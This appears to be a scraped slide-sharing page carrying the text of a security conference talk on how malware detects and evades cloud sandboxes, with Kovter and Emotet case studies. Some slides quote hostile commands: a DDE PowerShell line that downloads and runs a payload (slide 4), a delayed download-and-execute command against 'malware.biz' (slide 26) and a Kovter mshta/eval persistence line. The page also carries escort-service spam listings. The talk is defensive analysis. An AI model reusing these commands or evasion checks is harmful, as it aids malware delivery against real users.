STIX Patterning: Viva la revolución!STIX Patterning: Viva la revolución!
STIX Patterning: Viva la revolución!
 
DevSecCon Talk: An experiment in agile Threat Modelling
DevSecCon Talk: An experiment in agile Threat ModellingDevSecCon Talk: An experiment in agile Threat Modelling
DevSecCon Talk: An experiment in agile Threat Modelling
 

Plus de Priyanka Aash

Digital Personal Data Protection (DPDP) Practical Approach For CISOs
Digital Personal Data Protection (DPDP) Practical Approach For CISOsDigital Personal Data Protection (DPDP) Practical Approach For CISOs
Digital Personal Data Protection (DPDP) Practical Approach For CISOsPriyanka Aash
 
Verizon Breach Investigation Report (VBIR).pdf
Verizon Breach Investigation Report (VBIR).pdfVerizon Breach Investigation Report (VBIR).pdf
Verizon Breach Investigation Report (VBIR).pdfPriyanka Aash
 
Top 10 Security Risks .pptx.pdf
Top 10 Security Risks .pptx.pdfTop 10 Security Risks .pptx.pdf
Top 10 Security Risks .pptx.pdfPriyanka Aash
 
Simplifying data privacy and protection.pdf
Simplifying data privacy and protection.pdfSimplifying data privacy and protection.pdf
Simplifying data privacy and protection.pdfPriyanka Aash
 
Generative AI and Security (1).pptx.pdf
Generative AI and Security (1).pptx.pdfGenerative AI and Security (1).pptx.pdf
Generative AI and Security (1).pptx.pdfPriyanka Aash
 
EVERY ATTACK INVOLVES EXPLOITATION OF A WEAKNESS.pdf
EVERY ATTACK INVOLVES EXPLOITATION OF A WEAKNESS.pdfEVERY ATTACK INVOLVES EXPLOITATION OF A WEAKNESS.pdf
EVERY ATTACK INVOLVES EXPLOITATION OF A WEAKNESS.pdfPriyanka Aash
 
Cyber Truths_Are you Prepared version 1.1.pptx.pdf
Cyber Truths_Are you Prepared version 1.1.pptx.pdfCyber Truths_Are you Prepared version 1.1.pptx.pdf
Cyber Truths_Are you Prepared version 1.1.pptx.pdfPriyanka Aash
 
Cyber Crisis Management.pdf
Cyber Crisis Management.pdfCyber Crisis Management.pdf
Cyber Crisis Management.pdfPriyanka Aash
 
CISOPlatform journey.pptx.pdf
CISOPlatform journey.pptx.pdfCISOPlatform journey.pptx.pdf
CISOPlatform journey.pptx.pdfPriyanka Aash
 
Chennai Chapter.pptx.pdf
Chennai Chapter.pptx.pdfChennai Chapter.pptx.pdf
Chennai Chapter.pptx.pdfPriyanka Aash
 
Cloud attack vectors_Moshe.pdf
Cloud attack vectors_Moshe.pdfCloud attack vectors_Moshe.pdf
Cloud attack vectors_Moshe.pdfPriyanka Aash
 
Stories From The Web 3 Battlefield
Stories From The Web 3 BattlefieldStories From The Web 3 Battlefield
Stories From The Web 3 BattlefieldPriyanka Aash
 
Lessons Learned From Ransomware Attacks
Lessons Learned From Ransomware AttacksLessons Learned From Ransomware Attacks
Lessons Learned From Ransomware AttacksPriyanka Aash
 
Emerging New Threats And Top CISO Priorities In 2022 (Chennai)
Emerging New Threats And Top CISO Priorities In 2022 (Chennai)Emerging New Threats And Top CISO Priorities In 2022 (Chennai)
Emerging New Threats And Top CISO Priorities In 2022 (Chennai)Priyanka Aash
 
Emerging New Threats And Top CISO Priorities In 2022 (Mumbai)
Emerging New Threats And Top CISO Priorities In 2022 (Mumbai)Emerging New Threats And Top CISO Priorities In 2022 (Mumbai)
Emerging New Threats And Top CISO Priorities In 2022 (Mumbai)Priyanka Aash
 
Emerging New Threats And Top CISO Priorities in 2022 (Bangalore)
Emerging New Threats And Top CISO Priorities in 2022 (Bangalore)Emerging New Threats And Top CISO Priorities in 2022 (Bangalore)
Emerging New Threats And Top CISO Priorities in 2022 (Bangalore)Priyanka Aash
 
Cloud Security: Limitations of Cloud Security Groups and Flow Logs
Cloud Security: Limitations of Cloud Security Groups and Flow LogsCloud Security: Limitations of Cloud Security Groups and Flow Logs
Cloud Security: Limitations of Cloud Security Groups and Flow LogsPriyanka Aash
 
Cyber Security Governance
Cyber Security GovernanceCyber Security Governance
Cyber Security GovernancePriyanka Aash
 

Plus de Priyanka Aash (20)

Digital Personal Data Protection (DPDP) Practical Approach For CISOs
Digital Personal Data Protection (DPDP) Practical Approach For CISOsDigital Personal Data Protection (DPDP) Practical Approach For CISOs
Digital Personal Data Protection (DPDP) Practical Approach For CISOs
 
Verizon Breach Investigation Report (VBIR).pdf
Verizon Breach Investigation Report (VBIR).pdfVerizon Breach Investigation Report (VBIR).pdf
Verizon Breach Investigation Report (VBIR).pdf
 
Top 10 Security Risks .pptx.pdf
Top 10 Security Risks .pptx.pdfTop 10 Security Risks .pptx.pdf
Top 10 Security Risks .pptx.pdf
 
Simplifying data privacy and protection.pdf
Simplifying data privacy and protection.pdfSimplifying data privacy and protection.pdf
Simplifying data privacy and protection.pdf
 
Generative AI and Security (1).pptx.pdf
Generative AI and Security (1).pptx.pdfGenerative AI and Security (1).pptx.pdf
Generative AI and Security (1).pptx.pdf
 
EVERY ATTACK INVOLVES EXPLOITATION OF A WEAKNESS.pdf
EVERY ATTACK INVOLVES EXPLOITATION OF A WEAKNESS.pdfEVERY ATTACK INVOLVES EXPLOITATION OF A WEAKNESS.pdf
EVERY ATTACK INVOLVES EXPLOITATION OF A WEAKNESS.pdf
 
DPDP Act 2023.pdf
DPDP Act 2023.pdfDPDP Act 2023.pdf
DPDP Act 2023.pdf
 
Cyber Truths_Are you Prepared version 1.1.pptx.pdf
Cyber Truths_Are you Prepared version 1.1.pptx.pdfCyber Truths_Are you Prepared version 1.1.pptx.pdf
Cyber Truths_Are you Prepared version 1.1.pptx.pdf
 
Cyber Crisis Management.pdf
Cyber Crisis Management.pdfCyber Crisis Management.pdf
Cyber Crisis Management.pdf
 
CISOPlatform journey.pptx.pdf
CISOPlatform journey.pptx.pdfCISOPlatform journey.pptx.pdf
CISOPlatform journey.pptx.pdf
 
Chennai Chapter.pptx.pdf
Chennai Chapter.pptx.pdfChennai Chapter.pptx.pdf
Chennai Chapter.pptx.pdf
 
Cloud attack vectors_Moshe.pdf
Cloud attack vectors_Moshe.pdfCloud attack vectors_Moshe.pdf
Cloud attack vectors_Moshe.pdf
 
Stories From The Web 3 Battlefield
Stories From The Web 3 BattlefieldStories From The Web 3 Battlefield
Stories From The Web 3 Battlefield
 
Lessons Learned From Ransomware Attacks
Lessons Learned From Ransomware AttacksLessons Learned From Ransomware Attacks
Lessons Learned From Ransomware Attacks
 
Emerging New Threats And Top CISO Priorities In 2022 (Chennai)
Emerging New Threats And Top CISO Priorities In 2022 (Chennai)Emerging New Threats And Top CISO Priorities In 2022 (Chennai)
Emerging New Threats And Top CISO Priorities In 2022 (Chennai)
 
Emerging New Threats And Top CISO Priorities In 2022 (Mumbai)
Emerging New Threats And Top CISO Priorities In 2022 (Mumbai)Emerging New Threats And Top CISO Priorities In 2022 (Mumbai)
Emerging New Threats And Top CISO Priorities In 2022 (Mumbai)
 
Emerging New Threats And Top CISO Priorities in 2022 (Bangalore)
Emerging New Threats And Top CISO Priorities in 2022 (Bangalore)Emerging New Threats And Top CISO Priorities in 2022 (Bangalore)
Emerging New Threats And Top CISO Priorities in 2022 (Bangalore)
 
Cloud Security: Limitations of Cloud Security Groups and Flow Logs
Cloud Security: Limitations of Cloud Security Groups and Flow LogsCloud Security: Limitations of Cloud Security Groups and Flow Logs
Cloud Security: Limitations of Cloud Security Groups and Flow Logs
 
Cyber Security Governance
Cyber Security GovernanceCyber Security Governance
Cyber Security Governance
 
Ethical Hacking
Ethical HackingEthical Hacking
Ethical Hacking
 

Dernier

08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking MenDelhi Call girls
 
Breaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountBreaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountPuma Security, LLC
 
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...shyamraj55
 
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationSafe Software
 
FULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | Delhi
FULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | DelhiFULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | Delhi
FULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | Delhisoniya singh
 
IAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsIAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsEnterprise Knowledge
 
SIEMENS: RAPUNZEL – A Tale About Knowledge Graph
SIEMENS: RAPUNZEL – A Tale About Knowledge GraphSIEMENS: RAPUNZEL – A Tale About Knowledge Graph
SIEMENS: RAPUNZEL – A Tale About Knowledge GraphNeo4j
 
Enhancing Worker Digital Experience: A Hands-on Workshop for Partners
Enhancing Worker Digital Experience: A Hands-on Workshop for PartnersEnhancing Worker Digital Experience: A Hands-on Workshop for Partners
Enhancing Worker Digital Experience: A Hands-on Workshop for PartnersThousandEyes
 
The Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxThe Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxMalak Abu Hammad
 
Swan(sea) Song – personal research during my six years at Swansea ... and bey...
Swan(sea) Song – personal research during my six years at Swansea ... and bey...Swan(sea) Song – personal research during my six years at Swansea ... and bey...
Swan(sea) Song – personal research during my six years at Swansea ... and bey...Alan Dix
 
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...Neo4j
 
How to convert PDF to text with Nanonets
How to convert PDF to text with NanonetsHow to convert PDF to text with Nanonets
How to convert PDF to text with Nanonetsnaman860154
 
Maximizing Board Effectiveness 2024 Webinar.pptx
Maximizing Board Effectiveness 2024 Webinar.pptxMaximizing Board Effectiveness 2024 Webinar.pptx
Maximizing Board Effectiveness 2024 Webinar.pptxOnBoard
 
Pigging Solutions Piggable Sweeping Elbows
Pigging Solutions Piggable Sweeping ElbowsPigging Solutions Piggable Sweeping Elbows
Pigging Solutions Piggable Sweeping ElbowsPigging Solutions
 
08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking MenDelhi Call girls
 
AI as an Interface for Commercial Buildings
AI as an Interface for Commercial BuildingsAI as an Interface for Commercial Buildings
AI as an Interface for Commercial BuildingsMemoori
 
Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)Allon Mureinik
 
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 3652toLead Limited
 
Unblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen FramesUnblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen FramesSinan KOZAK
 
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure serviceWhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure servicePooja Nehwal
 

Dernier (20)

08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
 
Breaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountBreaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path Mount
 
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
 
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
 
FULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | Delhi
FULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | DelhiFULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | Delhi
FULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | Delhi
 
IAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsIAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI Solutions
 
SIEMENS: RAPUNZEL – A Tale About Knowledge Graph
SIEMENS: RAPUNZEL – A Tale About Knowledge GraphSIEMENS: RAPUNZEL – A Tale About Knowledge Graph
SIEMENS: RAPUNZEL – A Tale About Knowledge Graph
 
Enhancing Worker Digital Experience: A Hands-on Workshop for Partners
Enhancing Worker Digital Experience: A Hands-on Workshop for PartnersEnhancing Worker Digital Experience: A Hands-on Workshop for Partners
Enhancing Worker Digital Experience: A Hands-on Workshop for Partners
 
The Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxThe Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptx
 
Swan(sea) Song – personal research during my six years at Swansea ... and bey...
Swan(sea) Song – personal research during my six years at Swansea ... and bey...Swan(sea) Song – personal research during my six years at Swansea ... and bey...
Swan(sea) Song – personal research during my six years at Swansea ... and bey...
 
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
 
How to convert PDF to text with Nanonets
How to convert PDF to text with NanonetsHow to convert PDF to text with Nanonets
How to convert PDF to text with Nanonets
 
Maximizing Board Effectiveness 2024 Webinar.pptx
Maximizing Board Effectiveness 2024 Webinar.pptxMaximizing Board Effectiveness 2024 Webinar.pptx
Maximizing Board Effectiveness 2024 Webinar.pptx
 
Pigging Solutions Piggable Sweeping Elbows
Pigging Solutions Piggable Sweeping ElbowsPigging Solutions Piggable Sweeping Elbows
Pigging Solutions Piggable Sweeping Elbows
 
08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men
 
AI as an Interface for Commercial Buildings
AI as an Interface for Commercial BuildingsAI as an Interface for Commercial Buildings
AI as an Interface for Commercial Buildings
 
Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)
 
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
 
Unblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen FramesUnblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen Frames
 
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure serviceWhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
 

Playing games-in-the-sandbox-dynamic-analysis-and-modern-evasion-tactics copy1

  • 1. SESSION ID: #RSAC Michael Wood PLAYING GAMES IN THE SANDBOX— DYNAMIC ANALYSIS AND MODERN EVASION TACTICS AIR-F03 Senior Manager, Dynamic Protection, SophosLabs Sophos
  • 2. # R S A C Cloud Sandbox 2 Internet Known Good Execute Known Bad? Sandbox
  • 3. # R S A C • Malware comes in all shapes and sizes… o Windows executables o Office & PDF documents o Scripts, Java, Windows Shortcuts o Zip, Tar, Rar, & archives • Detect 0-day threats based on behavior What is a Cloud Sandbox useful for? 3
  • 4. # R S A C Example: 0-day DDE exploit 4 Intended use – spreadsheet data link { DDEAUTO excel "C:My DocumentsProfits.xls“ "Sheet1!R1C1:R4C4" p } Exploited use – malware download { DDEAUTO cmd.exe “/k powershell -NonI -NoP -sta $a1=(new-object IO.StreamReader ((([Net.WebRequest]::Create([System.Uri]'http://redacted[.]com/kdjsw2 3FGS')).GetResponse()).GetResponseStream())).ReadToEnd();powershell - e $a1” }
  • 5. # R S A C • Malware comes in all shapes and sizes… o Windows executables o Office & PDF documents o Scripts, Java, Windows Shortcuts o Zip, Tar, Rar, & archives • Detect 0-day threats based on behavior • But what if the threat behaves differently in the Sandbox? What is a Cloud Sandbox useful for? 5
  • 6. # R S A C Evasive threats 6 IF is_sandbox() THEN something_good() ELSE something_bad()
  • 7. # R S A C is_sandbox() •Artifacts: Files, Registry Keys, Drivers, Disk/CPU names •Behavior: CPU behavior Anti-VM •Artifacts: tools or scripts, realistic hardware •Behavior: human-like activity Anti-sandbox •Explicit delay: Sleep(…) •Implicit delay: user interaction required Timing
  • 8. # R S A C something_good() ExitProcess() Loop forever Self delete
  • 10. # R S A C Kovter Malware HKLMSOFTWAREMicrosoftWindowsCurrentVersionRun mshta.exe javascript: W9N=new ActiveXObject("WScript.Shell"); ztJ4n7=W9N.RegRead("HKCUsoftware4a9e7b11c06bee3829"); eval(ztJ4n7);
  • 11. # R S A C Kovter – VM Evasion Tests 11 Running processes VBoxService.exe VMwareUser.exe Registry keys HARDWAREACPIDSDTVBOX__ HKLMSOFTWAREVMWare, Inc. Other artifacts .vmmemctl PIPE VMwareCopyPasteSetClipboard event
  • 12. # R S A C CPUID - Artifacts CPUID Vendor -> “GenuineIntel” CPUID Hypervisor -> 0x0 CPUID Vendor -> “KVMKVMKVM” CPUID Hypervisor -> 0x80000000
  • 13. # R S A C CPUID - Timing CPUID… CPUID… …“GenuineIntel” t1 t2 t1t2 CPUID cost
  • 14. # R S A C Evasive Activity Legitimacy
  • 16. # R S A C Document Malware
  • 17. # R S A C Macro Evasion: Realistic Filename “Is my file name… “ “… only hexadecimal characters?“
  • 18. # R S A C Macro Evasion: Realistic History “Is there fewer than 3 recently used files?“
  • 19. # R S A C Macro Evasion: Blacklist Processes “Are there any VM or analysis tools running?“
  • 20. # R S A C Macro Evasion: GEO IP “Does the GEO IP match my target?“
  • 21. # R S A C Leverage #1 - Protection is_sandbox() something_bad()
  • 22. # R S A C Leverage #2 – Bypass Does C:B78AE926 exist? No: Run evasions Yes: Run malware
  • 23. # R S A C Leverage #3 - Vaccination is_sandbox() == TRUE
  • 25. # R S A C Documents: Some Clicks Required
  • 26. # R S A C Time: 0 min Time: 2 min Time: 5 min Explicit Delay powershell “ sleep 300; new-object system.net.webclient.downloadfile). Invoke('https://malware.biz/foo',‘%TEMP%Local.exe') & start-process ‘%TEMP%Local.exe'" Sandbox Analysis
  • 27. # R S A C Implicit Delay: Busy work FOR i=0; i < 500,000; i++ DO IsDebuggerPresent() END FOR Bare Metal Virtual Machine Sandbox
  • 28. # R S A C Typical Human Input GetLastInputInfo() GetCursorPos()
  • 29. # R S A C File Structure > unzip -l IMAGES.ZIP Length Date Time Name --------- ---------- ----- ---- 518144 2018-01-17 02:17 IMG_1715.jpg <--- Windows EXE!!! 364671 2018-01-13 12:39 IMG_1716.jpg <--- JPEG image 430040 2018-01-13 12:39 IMG_1717.jpg <--- JPEG image 452211 2018-01-13 12:39 IMG_1718.jpg <--- JPEG image 391279 2018-01-13 12:38 IMG_1719.jpg <--- JPEG image --------- ------- 2156345 5 files
  • 31. # R S A C Emotet Delivery: Some Clicks Required
  • 32. # R S A C Emotet: Custom Loader Jul 2017 – Decrypts in-place Aug 2017 – Loader added Packed EXE decrypt Emotet EXE Packed EXE decrypt Emotet EXE Loader EXE
  • 33. # R S A C Emotet EXE Emotet – Oct 2017, is_sandbox() v1 Loader EXE evasions is_sandboxsample.exe artifact.exe John Doe TEQUILABOOMBOOM Wilbert / SC admin / SystemIT C:123email.doc C:email.htm C:email.doc
  • 34. # R S A C Emotet: Loader In-Memory Obfuscation Emotet EXE Loader EXE busy work Stolen Code 1. New memory region for stolen instructions 2. Steal instructions from EXE, patch in detour to “busy work” routine evasions
  • 35. # R S A C Emotet: Dec 2017, is_sandbox() v2 Loader Evasions V1 String comparisons – tested via lstrcmpA API File existence – tested via CreateFileA API Sandbox detected => ExitProcess() Loader Evasions V2 String comparisons – inline strcmp function, no API File existence – full file system enumeration via FindFirstFile API Sandbox detected => repeat evasion tests, infinitely
  • 36. # R S A C Emotet: Dec 2017, is_sandbox() v2 Loader Evasions V1 String comparisons – tested via lstrcmpA API File existence – tested via CreateFileA API Sandbox detected => ExitProcess() Loader Evasions V2 String comparisons – inline strcmp function, no API File existence – full file system enumeration via FindFirstFile API Sandbox detected => repeat evasion tests, infinitely Hide sensitive strings, like “TEQUILABOOMBOOM” Queries for sensitive data remain
  • 37. # R S A C Emotet: Dec 2017, is_sandbox() v2 Loader Evasions V1 String comparisons – tested via lstrcmpA API File existence – tested via CreateFileA API Sandbox detected => ExitProcess() Loader Evasions V2 String comparisons – inline strcmp function, no API File existence – full file system enumeration via FindFirstFile API Sandbox detected => repeat evasion tests, infinitely Hide sensitive strings, like “sample.exe” Huge increase in file system inspection activity
  • 38. # R S A C Emotet: Dec 2017, is_sandbox() v2 Loader Evasions V1 String comparisons – tested via lstrcmpA API File existence – tested via CreateFileA API Sandbox detected => ExitProcess() Loader Evasions V2 String comparisons – inline strcmp function, no API File existence – full file system enumeration via FindFirstFile API Sandbox detected => repeat evasion tests, infinitely Avoid bailout “tell” Repeated increase in file system inspection activity
  • 39. # R S A C Emotet: Jan 2018, Evasion Fragments 39 is_sandbox() disabled, but … Dec 2017 TEQUILABOOMBOOM SystemIT John Doe Jan 2018 "T E Q U I L A B O O M B O O M” “S y s t e m I T” Aller Doe
  • 40. # R S A C Emotet: Feb 2018, Evasion Retraction Emotet EXE Loader EXE Stolen Code busy work evasions
  • 41. # R S A C Emotet Evasive Tactic Timeline Jul 2017 •Busy work Aug 2017 •Loader module Oct 2017 •is_sandbox v1 Dec 2017 •is_sandbox v2 •something_good v2 Jan 2018 •is_sandbox “off” •Fragments remain Feb 2018 •is_sandbox removed
  • 43. # R S A C Summary Leverage • is_sandbox() == something_bad() Battle ground • Infinitely many tactics, equally many defenses Raise the bar • Attacks require greater depth & complexity
  • 44. # R S A C Predictions Virtual machine tactics - expect decline •Existing mitigations, assets in the cloud Human-like behavior – expect growth •Real user activity, victim profiling Avoid detonation – expect growth •Dodge execution in the Sandbox altogether
  • 45. # R S A C Actions: Engage, Familiarize, Experiment • Security partner’s approach to evasive threatsEngage • Open-source tools to test anti-sandbox tacticsFamiliarize • Deploy your own open-source sandboxExperiment PAFish Tool https://github.com/a0rtega/pafish Al-KhaserTool https://github.com/LordNoteworthy/al-khaser Cuckoo Sandbox https://cuckoosandbox.org/